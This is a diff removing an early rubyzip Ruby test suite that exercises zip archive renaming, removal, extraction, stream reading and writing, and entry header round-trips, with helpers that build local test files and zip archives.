-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?(entryToRemove))
-    zf.remove(entryToRemove)
-    assert(! zf.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zf.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zfRead.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zfRead.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zfRead.close
-  end
-
-
-  def test_rename
-    entryToRename, *remainingEntries = TEST_ZIP.entryNames
-    
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?  entryToRename)
-    
-    newName = "changed name"
-    assert(! zf.entries.map { |e| e.name }.include?(newName))
-
-    zf.rename(entryToRename, newName)
-    assert(zf.entries.map { |e| e.name }.include?  newName)
-
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.map { |e| e.name }.include?  newName)
-    zfRead.close
-  end
-
-  def test_renameToExistingEntry
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.rename(zf.entries[0], zf.entries[1].name)
-      }
-    }
-
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameToExistingEntryOverwrite
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-    
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.rename(zf.entries[0], zf.entries[1].name) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    oldEntries.delete_at(0)
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, 
-        zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameNonEntry
-    nonEntry = "bogusEntry"
-    targetEntry = "targetEntryName"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zf.entries.include?(nonEntry))
-    assert_exception(ZipNoSuchEntryError) {
-      zf.rename(nonEntry, targetEntry)
-    }
-    zf.commit
-    assert(! zf.entries.include?(targetEntry))
-  ensure
-    zf.close
-  end
-
-  def test_renameEntryToExistingEntry
-    entry1, entry2, *remaining = TEST_ZIP.entryNames
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipEntryExistsError) {
-      zf.rename(entry1, entry2)
-    }
-  ensure 
-    zf.close
-  end
-
-  def test_replace
-    unchangedEntries = TEST_ZIP.entryNames.dup
-    entryToReplace = unchangedEntries.delete_at(2)
-    newEntrySrcFilename = "ziptest.rb" 
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    zf.replace(entryToReplace, newEntrySrcFilename)
-    
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    AssertEntry::assertContents(newEntrySrcFilename, 
-        zfRead.getInputStream(entryToReplace) { |is| is.read })
-    zfRead.close    
-  end
-
-  def test_replaceNonEntry
-    entryToReplace = "nonExistingEntryname"
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assert_exception(ZipNoSuchEntryError) {
-  zf.replace(entryToReplace, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_commit
-    newName = "renamedFirst"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    oldName = zf.entries.first
-    zf.rename(oldName, newName)
-    zf.commit
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.detect { |e| e.name == newName } != nil)
-    assert(zfRead.entries.detect { |e| e.name == oldName } == nil)
-    zfRead.close
-
-    zf.close
-  end
-
-  # This test tests that after commit, you
-  # can delete the file you used to add the entry to the zip file
-  # with
-  def test_commitUseZipEntry
-    File.copy(TestFiles::RANDOM_ASCII_FILE1, "okToDelete.txt")
-    zf = ZipFile.open(TEST_ZIP.zipName)
-    zf.add("okToDelete.txt", "okToDelete.txt")
-    assertContains(zf, "okToDelete.txt")
-    zf.commit
-    File.move("okToDelete.txt", "okToDeleteMoved.txt")
-    assertContains(zf, "okToDelete.txt", "okToDeleteMoved.txt")
-  end
-
-#  def test_close
-#    zf = ZipFile.new(TEST_ZIP.zipName)
-#    zf.close
-#    assert_exception(IOError) {
-#      zf.extract(TEST_ZIP.entryNames.first, "hullubullu")
-#    }
-#  end
-
-  def test_compound1
-    renamedName = "renamedName"
-    originalEntries = []
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-
-      assertNotContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-      zf.add(TestFiles::RANDOM_ASCII_FILE1, 
-       TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-
-      zf.rename(zf.entries[0], renamedName)
-      assertContains(zf, renamedName)
-
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, originalEntries.last.to_s)
-      zf.remove(originalEntries.last.to_s)
-      assertNotContains(zf, originalEntries.last.to_s)
-      
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      assertContains(zfRead, TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zfRead, renamedName)
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  assertContains(zfRead, filename)
-      }
-      assertNotContains(zfRead, originalEntries.last.to_s)
-    ensure
-      zfRead.close
-    end
-  end
-
-  def test_compound2
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-      
-      originalEntries.each {
-  |entry|
-  zf.remove(entry)
-  assertNotContains(zf, entry)
-      }
-      assert(zf.entries.empty?)
-      
-      TestFiles::ASCII_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-      assert_equals(zf.entries.map { |e| e.name }, TestFiles::ASCII_TEST_FILES)
-      
-      zf.rename(TestFiles::ASCII_TEST_FILES[0], "newName")
-      assertNotContains(zf, TestFiles::ASCII_TEST_FILES[0])
-      assertContains(zf, "newName")
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      asciiTestFiles = TestFiles::ASCII_TEST_FILES.dup
-      asciiTestFiles.shift
-      asciiTestFiles.each {
-  |filename|
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, "newName")
-    ensure
-      zfRead.close
-    end
-  end
-
-  private
-  def assertContains(zf, entryName, filename = entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} != nil, "entry #{entryName} not in #{zf.entries.join(', ')} in zip file #{zf}")
-    assertEntryContents(zf, entryName, filename) if File.exists?(filename)
-  end
-  
-  def assertNotContains(zf, entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} == nil, "entry #{entryName} in #{zf.entries.join(', ')} in zip file #{zf}")
-  end
-end
-
-class ZipFileExtractTest < CommonZipFileFixture
-  EXTRACTED_FILENAME = "extEntry"
-  ENTRY_TO_EXTRACT, *REMAINING_ENTRIES = TEST_ZIP.entryNames.reverse
-
-  def setup
-    super
-    File.delete(EXTRACTED_FILENAME) if File.exists?(EXTRACTED_FILENAME)
-  end
-
-  def test_extract
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(ENTRY_TO_EXTRACT, EXTRACTED_FILENAME)
-      
-      assert(File.exists? EXTRACTED_FILENAME)
-      AssertEntry::assertContents(EXTRACTED_FILENAME, 
-          zf.getInputStream(ENTRY_TO_EXTRACT) { |is| is.read })
-    }
-  end
-
-  def test_extractExists
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    assert_exception(ZipDestinationFileExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) { 
-  |zf| 
-  zf.extract(zf.entries.first, EXTRACTED_FILENAME) 
-      }
-    }
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert_equals(writtenText, f.read)
-    }
-  end
-
-  def test_extractExistsOverwrite
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(zf.entries.first, EXTRACTED_FILENAME) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert(writtenText != f.read)
-    }
-  end
-
-  def test_extractNonEntry
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipNoSuchEntryError) { zf.extract("nonExistingEntry", "nonExistingEntry") }
-  ensure
-    zf.close if zf
-  end
-
-  def test_extractNonEntry2
-    outFile = "outfile"
-    assert_exception(ZipNoSuchEntryError) {
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      nonEntry = "hotdog-diddelidoo"
-      assert(! zf.entries.include?(nonEntry))
-      zf.extract(nonEntry, outFile)
-      zf.close
-    }
-    assert(! File.exists?(outFile))
-  end
-
-end
-
-class ZipFileExtractDirectoryTest < CommonZipFileFixture
-  TEST_OUT_NAME = "emptyOutDir"
-
-  def openZip(&aProc)
-    assert(aProc != nil)
-    ZipFile.open(TestZipFile::TEST_ZIP4.zipName, &aProc)
-  end
-
-  def extractTestDir(&aProc)
-    openZip {
-      |zf|
-      zf.extract(TestFiles::EMPTY_TEST_DIR, TEST_OUT_NAME, &aProc)
-    }
-  end
-
-  def setup
-    super
-
-    Dir.rmdir(TEST_OUT_NAME)   if File.directory? TEST_OUT_NAME
-    File.delete(TEST_OUT_NAME) if File.exists?    TEST_OUT_NAME
-  end
-    
-  def test_extractDirectory
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-  
-  def test_extractDirectoryExistsAsDir
-    Dir.mkdir TEST_OUT_NAME
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-
-  def test_extractDirectoryExistsAsFile
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    assert_exception(ZipDestinationFileExistsError) { extractTestDir }
-  end
-
-  def test_extractDirectoryExistsAsFileOverwrite
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    gotCalled = false
-    extractTestDir { 
-      |entry, destPath| 
-      gotCalled = true
-      assert_equals(TEST_OUT_NAME, destPath)
-      assert(entry.isDirectory)
-      true
-    }
-    assert(gotCalled)
-    assert(File.directory? TEST_OUT_NAME)
-  end
-end
-
-
-TestFiles::createTestFiles(ARGV.index("recreate") != nil || 
-         ARGV.index("recreateonly") != nil)
-TestZipFile::createTestZips(ARGV.index("recreate") != nil || 
-          ARGV.index("recreateonly") != nil)
-exit if ARGV.index("recreateonly") != nil
-
-#require 'runit/cui/testrunner'
-#RUNIT::CUI::TestRunner.run(ZipFileTest.suite)
-
-# Copyright (C) 2002 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-require 'rubyunit'
-require 'zip'
-
-include Zip
-
-Dir.chdir "test"
-
-class AbstractInputStreamTest < RUNIT::TestCase
-  # AbstractInputStream subclass that provides a read method
-  
-  TEST_LINES = [ "Hello world#{$/}", 
-    "this is the second line#{$/}", 
-    "this is the last line"]
-  TEST_STRING = TEST_LINES.join
-  class TestAbstractInputStream 
-    include AbstractInputStream
-    def initialize(aString)
-      @contents = aString
-      @readPointer = 0
-    end
-
-    def read(charsToRead)
-      retVal=@contents[@readPointer, charsToRead]
-      @readPointer+=charsToRead
-      return retVal
-    end
-
-    def produceInput
-      read(100)
-    end
-
-    def inputFinished?
-      @contents[@readPointer] == nil
-    end
-  end
-
-  def setup
-    @io = TestAbstractInputStream.new(TEST_STRING)
-  end
-  
-  def test_gets
-    assert_equals(TEST_LINES[0], @io.gets)
-    assert_equals(TEST_LINES[1], @io.gets)
-    assert_equals(TEST_LINES[2], @io.gets)
-    assert_equals(nil, @io.gets)
-  end
-
-  def test_getsMultiCharSeperator
-    assert_equals("Hell", @io.gets("ll"))
-    assert_equals("o world#{$/}this is the second l", @io.gets("d l"))
-  end
-
-  def test_each_line
-    lineNumber=0
-    @io.each_line {
-      |line|
-      assert_equals(TEST_LINES[lineNumber], line)
-      lineNumber+=1
-    }
-  end
-
-  def test_readlines
-    assert_equals(TEST_LINES, @io.readlines)
-  end
-
-  def test_readline
-    test_gets
-    begin
-      @io.readline
-      fail "EOFError expected"
-      rescue EOFError
-    end
-  end
-end
-
-class ZipEntryTest < RUNIT::TestCase
-  TEST_ZIPFILE = "someZipFile.zip"
-  TEST_COMMENT = "a comment"
-  TEST_COMPRESSED_SIZE = 1234
-  TEST_CRC = 325324
-  TEST_EXTRA = "Some data here"
-  TEST_COMPRESSIONMETHOD = ZipEntry::DEFLATED
-  TEST_NAME = "entry name"
-  TEST_SIZE = 8432
-  TEST_ISDIRECTORY = false
-
-  def test_constructorAndGetters
-    entry = ZipEntry.new(TEST_ZIPFILE,
-       TEST_NAME,
-       TEST_COMMENT,
-       TEST_EXTRA,
-       TEST_COMPRESSED_SIZE,
-       TEST_CRC,
-       TEST_COMPRESSIONMETHOD,
-       TEST_SIZE)
-
-    assert_equals(TEST_COMMENT, entry.comment)
-    assert_equals(TEST_COMPRESSED_SIZE, entry.compressedSize)
-    assert_equals(TEST_CRC, entry.crc)
-    assert_equals(TEST_EXTRA, entry.extra)
-    assert_equals(TEST_COMPRESSIONMETHOD, entry.compressionMethod)
-    assert_equals(TEST_NAME, entry.name)
-    assert_equals(TEST_SIZE, entry.size)
-    assert_equals(TEST_ISDIRECTORY, entry.isDirectory)
-  end
-
-  def test_equality
-    entry1 = ZipEntry.new("file.zip", "name",  "isNotCompared", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry2 = ZipEntry.new("file.zip", "name",  "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry3 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry4 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry5 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry6 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123, 
-        ZipEntry::DEFLATED, 10000)  
-    entry7 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   10000)  
-    entry8 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   100000)  
-
-    assert_equals(entry1, entry1)
-    assert_equals(entry1, entry2)
-
-    assert(entry2 != entry3)
-    assert(entry3 != entry4)
-    assert(entry4 != entry5)
-    assert(entry5 != entry6)
-    assert(entry6 != entry7)
-    assert(entry7 != entry8)
-
-    assert(entry7 != "hello")
-    assert(entry7 != 12)
-  end
-end
-
-module IOizeString
-  attr_reader :tell
-  
-  def read(count = nil)
-    @tell ||= 0
-    count = size unless count
-    retVal = slice(@tell, count)
-    @tell += count
-    return retVal
-  end
-
-  def seek(index, offset)
-    @tell ||= 0
-    case offset
-    when IO::SEEK_END
-      newPos = size + index
-    when IO::SEEK_SET
-      newPos = index
-    when IO::SEEK_CUR
-      newPos = @tell + index
-    else
-      raise "Error in test method IOizeString::seek"
-    end
-    if (newPos < 0 || newPos >= size)
-      raise Errno::EINVAL
-    else
-      @tell=newPos
-    end
-  end
-
-  def reset
-    @tell = 0
-  end
-end
-
-class ZipLocalEntryTest < RUNIT::TestCase
-  def test_readLocalEntryHeaderOfFirstTestZipEntry
-    File.open(TestZipFile::TEST_ZIP3.zipName) {
-      |file|
-      entry = ZipEntry.readLocalEntry(file)
-      
-      assert_equal("", entry.comment)
-      # Differs from windows and unix because of CR LF
-      # assert_equal(480, entry.compressedSize)
-      # assert_equal(0x2a27930f, entry.crc)
-      # extra field is 21 bytes long
-      # probably contains some unix attrutes or something
-      # disabled: assert_equal(nil, entry.extra)
-      assert_equal(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equal(TestZipFile::TEST_ZIP3.entryNames[0], entry.name)
-      assert_equal(File.size(TestZipFile::TEST_ZIP3.entryNames[0]), entry.size)
-      assert(! entry.isDirectory)
-    }
-  end
-
-  def test_readLocalEntryFromNonZipFile
-    File.open("ziptest.rb") {
-      |file|
-      assert_equals(nil, ZipEntry.readLocalEntry(file))
-    }
-  end
-
-  def test_readLocalEntryFromTruncatedZipFile
-    zipFragment=""
-    File.open(TestZipFile::TEST_ZIP2.zipName) { |f| zipFragment = f.read(12) } # local header is at least 30 bytes
-    zipFragment.extend(IOizeString).reset
-    entry = ZipEntry.new
-    entry.readLocalEntry(zipFragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeEntry
-    entry = ZipEntry.new("file.zip", "entryName", "my little comment", 
-       "thisIsSomeExtraInformation", 100, 987654, 
-       ZipEntry::DEFLATED, 400)
-    writeToFile("localEntryHeader.bin", "centralEntryHeader.bin",  entry)
-    entryReadLocal, entryReadCentral = readFromFile("localEntryHeader.bin", "centralEntryHeader.bin")
-    compareLocalEntryHeaders(entry, entryReadLocal)
-    compareCDirEntryHeaders(entry, entryReadCentral)
-  end
-  
-  private
-  def compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.compressedSize   , entry2.compressedSize)
-    assert_equals(entry1.crc              , entry2.crc)
-    assert_equals(entry1.extra            , entry2.extra)
-    assert_equals(entry1.compressionMethod, entry2.compressionMethod)
-    assert_equals(entry1.name             , entry2.name)
-    assert_equals(entry1.size             , entry2.size)
-    assert_equals(entry1.localHeaderOffset, entry2.localHeaderOffset)
-  end
-
-  def compareCDirEntryHeaders(entry1, entry2)
-    compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.comment, entry2.comment)
-  end
-
-  def writeToFile(localFileName, centralFileName, entry)
-    File.open(localFileName,   "wb") { |f| entry.writeLocalEntry(f) }
-    File.open(centralFileName, "wb") { |f| entry.writeCDirEntry(f)  }
-  end
-
-  def readFromFile(localFileName, centralFileName)
-    localEntry = nil
-    cdirEntry  = nil
-    File.open(localFileName,   "rb") { |f| localEntry = ZipEntry.readLocalEntry(f) }
-    File.open(centralFileName, "rb") { |f| cdirEntry  = ZipEntry.readCDirEntry(f) }
-    return [localEntry, cdirEntry]
-  end
-end
-
-
-module DecompressorTests
-  # expects @refText and @decompressor
-
-  def test_readEverything
-    assert_equals(@refText, @decompressor.read)
-  end
-    
-  def test_readInChunks
-    chunkSize = 5
-    while (decompressedChunk = @decompressor.read(chunkSize))
-      assert_equals(@refText.slice!(0, chunkSize), decompressedChunk)
-    end
-    assert_equals(0, @refText.size)
-  end
-end
-
-class InflaterTest < RUNIT::TestCase
-  include DecompressorTests
-
-  def setup
-    @file = File.new("file1.txt.deflatedData", "rb")
-    @refText=""
-    File.open("file1.txt") { |f| @refText = f.read }
-    @decompressor = Inflater.new(@file)
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
-
-class PassThruDecompressorTest < RUNIT::TestCase
-  include DecompressorTests
-  TEST_FILE="file1.txt"
-  def setup
-    @file = File.new(TEST_FILE)
-    @refText=""
-    File.open(TEST_FILE) { |f| @refText = f.read }
-    @decompressor = PassThruDecompressor.new(@file, File.size(TEST_FILE))
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
- 
-module AssertEntry
-  def assertNextEntry(filename, zis)
-    assertEntry(filename, zis, zis.getNextEntry.name)
-  end
-
-  def assertEntry(filename, zis, entryName)
-    assert_equals(filename, entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  end
-
-  def assertEntryContentsForStream(filename, zis, entryName)
-    File.open(filename, "rb") {
-      |file|
-      expected = file.read
-      actual   = zis.read
-      if (expected != actual)
-  if (expected.length > 400 || actual.length > 400)
-    zipEntryFilename=entryName+".zipEntry"
-    File.open(zipEntryFilename, "wb") { |file| file << actual }
-    fail("File '#{filename}' is different from '#{zipEntryFilename}'")
-  else
-    assert_equals(expected, actual)
-  end
-      end
-    }
-  end
-
-  def AssertEntry.assertContents(filename, aString)
-    fileContents = ""
-    File.open(filename, "rb") { |f| fileContents = f.read }
-    if (fileContents != aString)
-      if (expected.length > 400 || actual.length > 400)
-  stringFile = filename + ".other"
-  File.open(stringFile, "wb") { |f| f << aString }
-  fail("File '#{filename}' is different from contents of string stored in '#{stringFile}'")
-      else
-  assert_equals(expected, actual)
-      end
-    end
-  end
-
-  def assertStreamContents(zis, testZipFile)
-    assert(zis != nil)
-    testZipFile.entryNames.each {
-      |entryName|
-      assertNextEntry(entryName, zis)
-    }
-    assert_equals(nil, zis.getNextEntry)
-  end
-
-  def assertTestZipContents(testZipFile)
-    ZipInputStream.open(testZipFile.zipName) {
-      |zis|
-      assertStreamContents(zis, testZipFile)
-    }
-  end
-
-  def assertEntryContents(zipFile, entryName, filename = entryName.to_s)
-    zis = zipFile.getInputStream(entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  ensure 
-    zis.close if zis
-  end
-end
-
-
-
-class ZipInputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  def test_new
-    zis = ZipInputStream.new(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    zis.close    
-  end
-
-  def test_openWithBlock
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    }
-  end
-
-  def test_openWithoutBlock
-    zis = ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-  end
-
-  def test_incompleteReads
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[0], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[1], entry.name)
-      assert_equals(0, entry.size)
-      assert_equals(nil, zis.gets)
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[2], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[3], entry.name)
-      assert zis.gets.length > 0
-    }
-  end
-  
-end
-
-class TestFiles
-  RANDOM_ASCII_FILE1  = "randomAscii1.txt"
-  RANDOM_ASCII_FILE2  = "randomAscii2.txt"
-  RANDOM_ASCII_FILE3  = "randomAscii3.txt"
-  RANDOM_BINARY_FILE1 = "randomBinary1.bin"
-  RANDOM_BINARY_FILE2 = "randomBinary2.bin"
-
-  EMPTY_TEST_DIR      = "emptytestdir"
-
-  ASCII_TEST_FILES  = [ RANDOM_ASCII_FILE1, RANDOM_ASCII_FILE2, RANDOM_ASCII_FILE3 ] 
-  BINARY_TEST_FILES = [ RANDOM_BINARY_FILE1, RANDOM_BINARY_FILE2 ]
-  TEST_DIRECTORIES  = [ EMPTY_TEST_DIR ]
-  TEST_FILES        = [ ASCII_TEST_FILES, BINARY_TEST_FILES, EMPTY_TEST_DIR ].flatten!
-
-  def TestFiles.createTestFiles(recreate)
-    if (recreate || 
-  ! (TEST_FILES.inject(true) { |accum, element| accum && File.exists?(element) }))
-      
-      ASCII_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomAscii(filename, 1E4 * (index+1))
-      }
-      
-      BINARY_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomBinary(filename, 1E4 * (index+1))
-      }
-
-      ensureDir(EMPTY_TEST_DIR)
-    end
-  end
-
-  private
-  def TestFiles.createRandomAscii(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand
-      end
-    }
-  end
-
-  def TestFiles.createRandomBinary(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand.to_a.pack("V")
-      end
-    }
-  end
-
-  def TestFiles.ensureDir(name) 
-    if File.exists?(name)
-      return if File.stat(name).directory?
-      File.delete(name)
-    end
-    Dir.mkdir(name)
-  end
-
-end
-
-# For representation and creation of
-# test data
-class TestZipFile
-  attr_accessor :zipName, :entryNames, :comment
-
-  def initialize(zipName, entryNames, comment = "")
-    @zipName=zipName
-    @entryNames=entryNames
-    @comment = comment
-  end
-
-  def TestZipFile.createTestZips(recreate)
-    files = Dir.entries(".")
-    if (recreate || 
-      ! (files.index(TEST_ZIP1.zipName) &&
-         files.index(TEST_ZIP2.zipName) &&
-         files.index(TEST_ZIP3.zipName) &&
-         files.index(TEST_ZIP4.zipName) &&
-         files.index("empty.txt")      &&
-         files.index("short.txt")      &&
-         files.index("longAscii.txt")  &&
-         files.index("longBinary.bin") ))
-      raise "failed to create test zip '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} ziptest.rb")
-      raise "failed to remove entry from '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} -d ziptest.rb")
-      
-      File.open("empty.txt", "w") {}
-      
-      File.open("short.txt", "w") { |file| file << "ABCDEF" }
-      ziptestTxt=""
-      File.open("ziptest.rb") { |file| ziptestTxt=file.read }
-      File.open("longAscii.txt", "w") {
-  |file|
-  while (file.tell < 1E5)
-    file << ziptestTxt
-  end
-      }
-      
-      testBinaryPattern=""
-      File.open("empty.zip") { |file| testBinaryPattern=file.read }
-      testBinaryPattern *= 4
-      
-      File.open("longBinary.bin", "wb") {
-  |file|
-  while (file.tell < 3E5)
-    file << testBinaryPattern << rand
-  end
-      }
-      raise "failed to create test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("zip #{TEST_ZIP2.zipName} #{TEST_ZIP2.entryNames.join(' ')}")
-
-      # without bash system interprets everything after echo as parameters to
-      # echo including | zip -z ...
-      raise "failed to add comment to test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("bash -c \"echo #{TEST_ZIP2.comment} | zip -z #{TEST_ZIP2.zipName}\"")
-
-      raise "failed to create test zip '#{TEST_ZIP3.zipName}'" unless 
-  system("zip #{TEST_ZIP3.zipName} #{TEST_ZIP3.entryNames.join(' ')}")
-
-      raise "failed to create test zip '#{TEST_ZIP4.zipName}'" unless 
-  system("zip #{TEST_ZIP4.zipName} #{TEST_ZIP4.entryNames.join(' ')}")
-    end
-  rescue 
-    raise $!.to_s + 
-      "\n\nziptest.rb requires the Info-ZIP program 'zip' in the path\n" +
-      "to create test data. If you don't have it you can download\n"   +
-      "the necessary test files at http://sf.net/projects/rubyzip."
-  end
-
-  TEST_ZIP1 = TestZipFile.new("empty.zip", [])
-  TEST_ZIP2 = TestZipFile.new("4entry.zip", %w{ longAscii.txt empty.txt short.txt longBinary.bin}, 
-            "my zip comment")
-  TEST_ZIP3 = TestZipFile.new("test1.zip", %w{ file1.txt })
-  TEST_ZIP4 = TestZipFile.new("zipWithDir.zip", [ "file1.txt", 
-        TestFiles::EMPTY_TEST_DIR])
-end
-
-
-class AbstractOutputStreamTest < RUNIT::TestCase
-  class TestOutputStream
-    include AbstractOutputStream
-
-    attr_accessor :buffer
-
-    def initialize
-      @buffer = ""
-    end
-
-    def << (data)
-      @buffer << data
-      self
-    end
-  end
-
-  def setup
-    @outputStream = TestOutputStream.new
-
-    @origCommaSep = $,
-    @origOutputSep = $\
-  end
-
-  def teardown
-    $, = @origCommaSep
-    $\ = @origOutputSep
-  end
-
-  def test_write
-    count = @outputStream.write("a little string")
-    assert_equals("a little string", @outputStream.buffer)
-    assert_equals("a little string".length, count)
-
-    count = @outputStream.write(". a little more")
-    assert_equals("a little string. a little more", @outputStream.buffer)
-    assert_equals(". a little more".length, count)
-  end
-  
-  def test_print
-    $\ = nil # record separator set to nil
-    @outputStream.print("hello")
-    assert_equals("hello", @outputStream.buffer)
-
-    @outputStream.print(" world.")
-    assert_equals("hello world.", @outputStream.buffer)
-    
-    @outputStream.print(" You ok ",  "out ", "there?")
-    assert_equals("hello world. You ok out there?", @outputStream.buffer)
-
-    $\ = "\n"
-    @outputStream.print
-    assert_equals("hello world. You ok out there?\n", @outputStream.buffer)
-
-    @outputStream.print("I sure hope so!")
-    assert_equals("hello world. You ok out there?\nI sure hope so!\n", @outputStream.buffer)
-
-    $, = "X"
-    @outputStream.buffer = ""
-    @outputStream.print("monkey", "duck", "zebra")
-    assert_equals("monkeyXduckXzebra\n", @outputStream.buffer)
-
-    $\ = nil
-    @outputStream.buffer = ""
-    @outputStream.print(20)
-    assert_equals("20", @outputStream.buffer)
-  end
-  
-  def test_printf
-    @outputStream.printf("%d %04x", 123, 123) 
-    assert_equals("123 007b", @outputStream.buffer)
-  end
-  
-  def test_putc
-    @outputStream.putc("A")
-    assert_equals("A", @outputStream.buffer)
-    @outputStream.putc(65)
-    assert_equals("AA", @outputStream.buffer)
-  end
-
-  def test_puts
-    @outputStream.puts
-    assert_equals("\n", @outputStream.buffer)
-
-    @outputStream.puts("hello", "world")
